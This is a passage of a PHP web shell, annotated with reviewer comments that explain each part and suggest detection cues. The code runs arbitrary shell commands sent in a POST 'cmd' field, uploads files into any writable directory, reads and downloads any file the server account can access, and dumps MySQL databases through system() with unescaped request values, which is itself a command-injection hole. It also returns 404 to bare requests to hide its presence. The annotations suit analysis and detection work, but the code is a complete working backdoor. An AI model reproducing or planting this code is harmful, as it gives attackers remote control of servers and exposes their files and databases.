📄 ".htmlspecialchars($full_path)."";
}
}
}
}
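/**
 * List the entries of a directory with sub-directories first, then files.
 *
 * Each group is sorted with PHP's default sort() ordering and the two groups
 * are concatenated into one re-indexed list. The "." and ".." entries that
 * scandir() reports are kept; is_dir() classifies them as directories.
 *
 * @param string $dir Directory to list. Callers in this file pass a
 *                    request-supplied value, so it is not a trusted path.
 * @return array Entry names (not full paths); empty when $dir cannot be read.
 */
function sort_scandir($dir) {
    $items = scandir($dir);
    // scandir() returns false for a missing or unreadable directory; without
    // this guard the foreach below would iterate over a boolean.
    if ($items === false) {
        return array();
    }
    $folders = array();
    $files = array();
    foreach ($items as $item) {
        if (is_dir($dir.'/'.$item)) {
            $folders[] = $item;
        } else {
            $files[] = $item;
        }
    }
    sort($folders);
    sort($files);
    return array_merge($folders, $files);
}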
// Database-dump endpoint: the connection parameters are read straight from the
// query string. No authentication or session check is visible in this span.
// NOTE(review): the password travels in the URL, so requests of this shape
// (db=, user=, pass=, host=) should be visible in web-server access logs.
$db = $_GET['db'] ?? NULL;
$user = $_GET['user'] ?? NULL;
$pass = $_GET['pass'] ?? NULL;
$host = $_GET['host'] ?? NULL;
if ($db) {
// The response is labelled as a file download named dump.sql.
header('Content-Type: application/sql');
header('Content-Disposition: attachment; filename="dump.sql"');
header('Content-Transfer-Encoding: binary');
// The four request values are concatenated unescaped into a shell command
// line (no escapeshellarg()), so this call is also a command-injection sink.
// system() writes the command's output directly into the response body.
system("mysqldump --host=".$host." --user=".$user." --password=".$pass." ".$db);
exit;
}
// Main dispatcher. "path" selects a directory or file to show and "download"
// selects a file to send back; both come from the query string and are used
// as filesystem paths without any restriction to a base directory.
// No authentication check is visible in this span.
// NOTE(review): most echo strings below are empty or hold only a newline; the
// HTML they carried was presumably lost when the listing was extracted.
$path = $_GET['path'] ?? NULL;
$download = $_GET['download'] ?? NULL;
if ($path) {
if (is_dir($path)) {
// Page header: prints the script's own directory and the request's Host header.
echo "".htmlspecialchars(dirname(__FILE__))."";
// $scheme is not read again in the visible code; it was presumably used in markup that is missing here.
$scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
echo "".htmlspecialchars($_SERVER['HTTP_HOST'])."";
echo "
";
echo "";
echo "";
echo "";
echo "";
echo "
";
// POST actions: the name of the submitted field (cmd, upload, mysql) selects the action.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_POST['cmd'])) {
// Command execution: the raw POST value is passed to shell_exec() with
// stderr redirected to stdout, and runs as the web-server account.
// For detection: a POST with a "cmd" field, and shell processes spawned
// by the PHP/web-server process.
$cmd = $_POST['cmd'];
echo "
";
echo "Command: ".htmlspecialchars($cmd)."\n";
$output = shell_exec($cmd . " 2>&1");
// On Windows the output is converted from CP866 (a DOS/OEM Cyrillic code page) to UTF-8.
if (stripos(PHP_OS, 'WIN') === 0) {
$output = mb_convert_encoding($output, 'UTF-8', 'CP866');
}
// Output is HTML-escaped before display; that only protects the page markup.
echo htmlspecialchars($output);
echo "";
echo "
";
}
// File upload: basename() removes directory components from the client-supplied
// name, but there is no extension or content check and the destination
// directory is the request-controlled $path, so any writable directory
// (including one inside the web root) can receive the file.
elseif (isset($_POST['upload'])) {
if (isset($_FILES['file']) and $_FILES['file']['error'] == UPLOAD_ERR_OK) {
if (move_uploaded_file($_FILES['file']['tmp_name'], $path.'/'.basename($_FILES['file']['name']))) {
echo "
";
}
}
}
// Database probe: connects with request-supplied host and credentials and runs
// SHOW DATABASES. The code that printed the result is not visible here.
elseif (isset($_POST['mysql'])) {
$host = $_POST['host'] ?? NULL;
$user = $_POST['user'] ?? NULL;
$pass = $_POST['pass'] ?? NULL;
$db = $_POST['db'] ?? NULL;
try {
$mysqli = mysqli_connect($host, $user, $pass, $db);
// mysqli_set_charset() is called before the connection result is checked below.
mysqli_set_charset($mysqli, 'utf8');
if ($mysqli) {
$result = $mysqli->query("SHOW DATABASES");
if ($result) {
echo "
";
echo "";
echo "
";
}
mysqli_close($mysqli);
}
}
catch(mysqli_sql_exception $mysqli_error) {
// $mysqli_error is not used in the visible code; presumably the message was printed in markup that is missing here.
echo "
";
}
}
}
// Optional recursive action: recurs() is defined outside this span and receives
// the directory plus the request's "recurs" value.
// NOTE(review): what it does with them cannot be determined from here.
$recurs = $_GET['recurs'] ?? NULL;
if ($recurs) {
echo "
";
echo "";
recurs($path, $recurs);
echo "
";
echo "
";
}
//files
// Directory listing: folders first, then files, each with an icon chosen by is_dir().
$files = sort_scandir($path);
echo "";
for($i = 0; $i < count($files); $i++) {
$full_path = realpath($path."/".$files[$i]);
if (is_dir($full_path)) {
$icon = "📁";
} else {
$icon = "📄";
}
echo "- ".$icon." ".htmlspecialchars($files[$i])."
";
}
echo "
";
}
// File view: highlight_file() prints the syntax-highlighted contents of the
// file at $path, so any file readable by the web-server account is disclosed,
// including PHP source and configuration files.
elseif (is_file($path)) {
// Backslashes are normalised to forward slashes before the file is shown.
$path = str_replace('\\', '/', $path);
echo "
";
highlight_file($path);
}
else {
header('HTTP/1.0 404 Not Found');
exit;
}
}
// Download: reached only when "path" is empty or absent. readfile() streams the
// file named by the request parameter as an attachment; the path is not
// restricted, so this is an arbitrary file read for the web-server account.
elseif ($download) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($download).'"');
header('Content-Length: '.filesize($download));
header('Cache-Control: must-revalidate');
header('Pragma: public');
readfile($download);
exit;
}
// With none of db, path or download set, the script answers 404 with no body,
// so a request for the bare URL does not reveal that the file exists.
else {
header('HTTP/1.0 404 Not Found');
exit;
}
?>